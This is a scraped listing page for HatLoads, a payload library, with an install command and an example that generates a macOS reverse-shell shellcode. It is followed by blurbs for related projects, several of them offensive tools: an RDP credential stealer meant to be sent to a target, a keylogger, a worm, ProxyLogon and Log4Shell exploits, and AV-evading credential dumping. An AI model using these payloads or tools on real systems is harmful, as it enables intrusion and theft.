HatSploit collection of generic payloads designed to provide a wide range of attacks without having to spend time writing new ones.

Last update: May 10, 2022

Related tags

Overview

HatLoads

HatSploit collection of generic payloads designed to provide a wide range of attacks without having to spend time writing new ones.

Features

Contains a lot of useful shellcodes in assembly and bytes.
Support for most common platforms like macOS, Linux, Windows.
Ability to get custom code and assemble it.

Installation

pip3 install git+https://github.com/EntySec/HatLoads

Basic functions

There are all HatLoads basic functions that can be used to generate payloads.

get_payload(self, platform, arch, payload, options={}, assemble=True) - Get assembly shellcode or assembled shellcode.

Examples

from hatloads import HatLoads

options = {
    'RHOST': '127.0.0.1',
    'RPORT': 8888
}

hatloads = HatLoads()
shellcode = hatloads.get_payload('macos', 'x64', 'shell_reverse_tcp')

Having a weak password is not good for a system that demands high confidentiality and security of user credentials

Having a weak password is not good for a system that demands high confidentiality and security of user credentials. It turns out that people find it difficult to make up a strong password that is strong enough to prevent unauthorized users from memorizing it.

0 Feb 7, 2022

NEW FACEBOOK CLONER WITH NEW PASSWORD, TERMUX FB CLONE, FB CLONING COMMAND. M

81 Jan 8, 2023

Simple script for looping a Denial Of Service (DoS) attack over one single mac address in range

Bluetooth Simple Denial Of Service (DoS) Legal Note This project is made only for educational purposes and for helping in Proofs of Concept. The autho

1 Jan 9, 2022

Some Attacks of Exchange SSRF ProxyLogon&ProxyShell

Some Attacks of Exchange SSRF This project is heavily replicated in ProxyShell, NtlmRelayToEWS https://mp.weixin.qq.com/s/GFcEKA48bPWsezNdVcrWag Get 1

129 Dec 30, 2022

LeLeLe: A tool to simplify the application of Lattice attacks.

LeLeLe is a very simple library (300 lines) to help you more easily implement lattice attacks, the library is inspired by Z3Py (python interfa

4 Dec 14, 2021

Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage and potential attacks.

Dependency Combobulator Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage

84 Dec 23, 2022

Wordlist attacks on Bitwarden data.json files

BitwardenDecryptBrute This is a slightly modified version of BitwardenDecrypt. In addition to the decryption this version can do wordlist attacks for

42 Nov 9, 2022

Python Toolkit containing different Cyber Attacks Tools

Helikopter Python Toolkit containing different Cyber Attacks Tools. Tools in Helikopter Toolkit 1. FattyNigger (PYTHON WORM) 2. Taxes (PYTHON PASS EXT

22 Dec 4, 2022

Official implementation of the paper "Backdoor Attacks on Self-Supervised Learning".

SSL-Backdoor Abstract Large-scale unlabeled data has allowed recent progress in self-supervised learning methods that learn rich visual representation

44 Nov 21, 2022

Releases(1.0.0)

1.0.0(Feb 6, 2022)

Source code(tar.gz)
Source code(zip)

Owner

EntySec

EntySec is a group of security professionals and software engineers involved in the development of security tools and services.

GitHub Repository https://hatsploit.netlify.app

RDP Stealer

RDP Stealer RDP Stealer by lamp Require Python How To Use Download This Source Extract The Zip File Change webhook url Convert to exe send to target I

14 Nov 26, 2022

A secure way of storing your passwords.

StrongBox 🔐 A secure way of storing your passwords. 🔑 Why to use StrongBox? StrongBox makes it possible to have a random generated strong password i

5 Dec 25, 2021

Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

Log4jHorizon Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. BLOG COMING SOON Code and README.md this time around are

96 Dec 14, 2022

Zero-attacker is an multipurpose hacking tool with over 12 tools

Zero Attacker Zero Attacker is bunch of tools which we made for people.These all tools are for purpose of ethical hacking and discord tools. Who is th

300 Dec 28, 2022

Writeups for wtf-CTF hosted by Manipal Information Security Team as part of Techweek2021- INCOGNITO

wtf-CTF_Writeups Table of Contents Table of Contents Crypto Misc Reverse Pwn Web Crypto wtf_Bot Author: Madjelly Join the discord server!You know how

6 Jun 07, 2021

Web Headers Security Scanner

3 Dec 16, 2022

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

ProxyLogon Pre-Auth SSRF To Arbitrary File Write For Education and Research Usage: C:\python proxylogon.py mail.evil.corp lulz 117 Nov 28, 2022

This tool help you to check if your Windows machine has hidden miner.

Hidden Miner Detector This tool help you to check if your Windows machine has hidden miner. Miners track when you open antivirus software or task mana

2 Oct 05, 2022

Dumping revelant information on compromised targets without AV detection

DonPAPI Dumping revelant information on compromised targets without AV detection DPAPI dumping Lots of credentials are protected by DPAPI (link ) We a

580 Jan 09, 2023

A Python application to predict what is cooking

ez-cuisine-classifier A Python application to predict what is cooking Environment Python 3.9 Windows 10 Install python -m venv venv .\venv\Scripts\act

1 Jun 21, 2022

Log4Shell Proof of Concept (CVE-2021-44228)

CVE-2021-44228 Log4Shell Proof of Concept (CVE-2021-44228) Make sure to use Java 8 JDK. Java 8 Download Images Credits Casey Dunham - Java Reverse She

3 Jul 23, 2022

Log4j-Scanner with Bind-Receipt and custom hostnames

Hrafna - Log4j-Scanner for the masses Features Scanning-system designed to check your own infra for vulnerable log4j-installations start and stop scan

18 Jan 23, 2022

Wonk is a tool for combining a set of AWS policy files into smaller compiled policy sets.

140 Dec 16, 2022

A bitcoin private keys brute-forcing tool. Educational purpose only.

BitForce A bitcoin private keys brute-forcing tool. If you have an average computer, his will take decades to find a private key with balance. Run Mak

2 Dec 20, 2022

2022-bridge - Example code belonging to the Bridge pattern video

Let's Take The Bridge Pattern To The Next Level This video covers how the bridge

11 Jun 14, 2022

KeyLogger

By-Emirhan KeyLogger Hangi Sistemlerde Çalışır? | On Which Systems Does It Work? KALİ LİNUX UBUNTU PARDUS MİNT TERMUX ARCH YÜKLEME & ÇALIŞTIRMA KOMUTL

2 Feb 24, 2022

IDA scripts for hypervisor (Hyper-v) analysis and reverse engineering automation

Re-Scripts IA32-VMX-Helper (IDA-Script) IA32-MSR-Decoder (IDA-Script) IA32 VMX Helper It's an IDA script (Updated IA32 MSR Decoder) which helps you to

16 Oct 08, 2022

Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

2 Dec 30, 2021

LdapRelayScan - Check for LDAP protections regarding the relay of NTLM authentication

LDAP Relay Scan A tool to check Domain Controllers for LDAP server protections r

315 Dec 18, 2022

RedDrop is a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives.

RedDrop Exfil Server Check out the accompanying MaverisLabs Blog Post Here! RedDrop Exfil Server is a Python Flask Web Server for Penetration Testers,

53 Nov 01, 2022

HatSploit collection of generic payloads designed to provide a wide range of attacks without having to spend time writing new ones.

Related tags

Overview

HatLoads

Features

Installation

Basic functions

Examples

You might also like...

Having a weak password is not good for a system that demands high confidentiality and security of user credentials

NEW FACEBOOK CLONER WITH NEW PASSWORD, TERMUX FB CLONE, FB CLONING COMMAND. M

Simple script for looping a Denial Of Service (DoS) attack over one single mac address in range

Some Attacks of Exchange SSRF ProxyLogon&ProxyShell

LeLeLe: A tool to simplify the application of Lattice attacks.

Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage and potential attacks.

Wordlist attacks on Bitwarden data.json files

Python Toolkit containing different Cyber Attacks Tools

Official implementation of the paper "Backdoor Attacks on Self-Supervised Learning".

Releases(1.0.0)

1.0.0(Feb 6, 2022)

Owner

EntySec

RDP Stealer

A secure way of storing your passwords.

Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

Zero-attacker is an multipurpose hacking tool with over 12 tools

Writeups for wtf-CTF hosted by Manipal Information Security Team as part of Techweek2021- INCOGNITO

Web Headers Security Scanner

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

This tool help you to check if your Windows machine has hidden miner.

Dumping revelant information on compromised targets without AV detection

A Python application to predict what is cooking

Log4Shell Proof of Concept (CVE-2021-44228)

Log4j-Scanner with Bind-Receipt and custom hostnames

Wonk is a tool for combining a set of AWS policy files into smaller compiled policy sets.

A bitcoin private keys brute-forcing tool. Educational purpose only.

2022-bridge - Example code belonging to the Bridge pattern video

KeyLogger

IDA scripts for hypervisor (Hyper-v) analysis and reverse engineering automation

Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

LdapRelayScan - Check for LDAP protections regarding the relay of NTLM authentication

RedDrop is a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives.